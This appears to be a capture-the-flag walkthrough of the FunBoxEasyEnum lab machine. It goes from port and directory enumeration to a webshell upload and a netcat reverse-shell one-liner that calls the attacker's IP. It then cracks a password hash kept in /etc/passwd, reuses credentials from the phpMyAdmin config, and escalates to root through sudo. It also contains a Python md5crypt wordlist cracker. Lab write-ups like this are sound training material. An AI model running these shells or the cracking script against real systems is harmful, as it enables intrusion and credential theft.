FunBoxEasyEnum
Nmap
sudo nmap 192.168.68.132 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.

We now move on to enumerating with dirsearch.py, first running the SecLists big.txt wordlist against the target.
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75

Viewing robots.txt, we find it contains:
Allow: Enum_this_Box
I ran dirsearch.py against this directory and was unable to find anything further. Viewing /phpmyadmin and attempting to log in with default credentials shows we are unable to proceed with the default root account.

Running dirsearch.py again on the target, this time using the --suffix parameter to append .php to every wordlist entry, we find /mini.php:
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php

Browsing to /mini.php we come to Zerion Mini Shell 1.0. Through the mini shell I uploaded a webshell as webshell.php.

Knowing that the uploaded file sits in the web root, I then browsed to /webshell.php and was able to execute commands, confirming we are running as www-data.

Running the command which nc shows we have netcat installed on the target machine. I set up a netcat listener on my attacking machine (192.168.49.68, port 80) and then ran the following command through the webshell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.68 80 >/tmp/f
This results in a reverse shell: the named pipe /tmp/f carries whatever the listener sends back into sh, so a single nc connection serves both directions.

Upgrade the shell:
/usr/bin/script -qc /bin/bash /dev/null
Checking /etc/passwd shows the user 'oracle' has a password hash stored directly in the file, rather than the usual x placeholder pointing to /etc/shadow.

I then took the hash and ran it under mode 500 (md5crypt) in Hashcat on my Windows host, which cracked the password as: hiphop
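The /etc/passwd finding is worth a closer look: a hash in the second field means the password was set without shadowing, so anyone who can read the world-readable /etc/passwd can crack it offline, which is exactly what hashcat mode 500 does. The Python script below is an added example and is not part of the original walkthrough or the box's files. It finds such entries, maps the $1$/$5$/$6$ prefix to the corresponding hashcat mode, and checks wordlist candidates against an md5crypt hash with a pure-Python implementation of the algorithm (the same computation hashcat performs in mode 500). The sample passwd lines, the salt examplsa, the wordlist and the oracle hash are all constructed for the example; the real hash from the box is not reproduced.

```python
"""Added example: triage of password hashes stored directly in /etc/passwd.
Finds entries whose second field is a real hash (not the shadowed 'x'), maps
the prefix to the hashcat mode, and checks wordlist candidates against
md5crypt ($1$) hashes, which is what hashcat mode 500 computes. All inputs
here are constructed; the real oracle hash from the box is not reproduced."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_PREFIXES = {"$1$": ("md5crypt", 500),        # modular-crypt prefix ->
                 "$5$": ("sha256crypt", 7400),    # (algorithm, hashcat mode)
                 "$6$": ("sha512crypt", 1800)}

def find_passwd_hashes(passwd_text):
    """[(user, hash)] for lines whose password field holds a real hash."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue
        user, pw = fields[0], fields[1]
        # 'x' means shadowed; '*', '!...' and '' are locked or passwordless
        if pw not in ("", "x", "*") and not pw.startswith("!"):
            found.append((user, pw))
    return found

def hashcat_mode(hash_str):
    """(algorithm name, hashcat mode) chosen by the hash's prefix."""
    for prefix, info in HASH_PREFIXES.items():
        if hash_str.startswith(prefix):
            return info
    return ("unknown", None)

def _to64(v, n):
    """md5crypt's base64 variant: n chars, least-significant 6 bits first."""
    out = ""
    for _ in range(n):
        out += ITOA64[v & 0x3F]
        v >>= 6
    return out

def md5crypt(password, salt):
    """Poul-Henning Kamp's md5crypt; password and salt are bytes, salt <= 8."""
    magic = b"$1$"
    salt = salt.split(b"$", 1)[0][:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    pl = len(password)
    while pl > 0:                          # one byte of alt per password byte
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(password)
    while i:                               # per-bit quirk: NUL or password[0]
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                  # stretching rounds
        c = hashlib.md5(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    enc = ""                               # byte reordering, then encoding
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        enc += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    enc += _to64(final[11], 2)
    return (magic + salt + b"$").decode() + enc

def check_md5crypt(hash_str, candidate):
    """True if the str candidate hashes to hash_str under that hash's salt."""
    parts = hash_str.split("$")            # ['', '1', salt, digest]
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an md5crypt hash")
    return md5crypt(candidate.encode(), parts[2].encode()) == hash_str

def crack_wordlist(hash_str, wordlist):
    """First wordlist entry that matches hash_str, else None."""
    return next((w for w in wordlist if check_md5crypt(hash_str, w)), None)

def matches_system_crypt(password="hiphop", salt="examplsa"):
    """Cross-check against crypt(3); None where Python no longer ships the
    crypt module (deprecated in 3.11, removed in 3.13)."""
    try:
        import crypt
    except ImportError:
        return None
    return crypt.crypt(password, "$1$" + salt) == md5crypt(password.encode(), salt.encode())

# Constructed sample input; the oracle hash is generated here, not copied from the box.
ORACLE_HASH = md5crypt(b"hiphop", b"examplsa")
SAMPLE_PASSWD = f"""root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
oracle:{ORACLE_HASH}:1001:1001::/home/oracle:/bin/bash
karla:x:1000:1000:karla:/home/karla:/bin/bash
"""
WORDLIST = ["password", "123456", "oracle", "hiphop"]

if __name__ == "__main__":
    for user, h in find_passwd_hashes(SAMPLE_PASSWD):
        name, mode = hashcat_mode(h)
        hit = crack_wordlist(h, WORDLIST) if name == "md5crypt" else None
        print(f"{user}: {name} (hashcat -m {mode}) -> {hit or 'no match'}")
```

Run it directly to print the triage of the constructed passwd file. On a real engagement, point find_passwd_hashes at the target's /etc/passwd and hand anything with a $5$ or $6$ prefix to hashcat with the mode the script reports; the in-script cracker only covers md5crypt, and the crypt(3) cross-check only runs where the stdlib crypt module still exists.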

I then used su to switch to the user 'oracle', which succeeded.

After poking about on the oracle user for a bit I could not find anything interesting. I tried the hiphop password against other users with no luck. I decided to move back to www-data so I could read some files in /etc/phpmyadmin.
I disconnected the shell and re-ran the reverse shell command through the web shell to reconnect as www-data. Moving into /etc/phpmyadmin and reading the config-db.php file, we see credential information.

We find the credentials phpmyadmin:tgbzhnujm!
I then logged in to MySQL and was unable to identify anything interesting in the contained databases.
From here I started trying the passwords against the users in the /home/ directory until I got a match on the user 'karla'.

Knowing this worked I exited the shell and logged in over SSH with the same credentials so we have all the advantages of an SSH shell.

Checking sudo -l we see karla can run any command as any user. For an easy root shell we can run the command below:
sudo /bin/bash
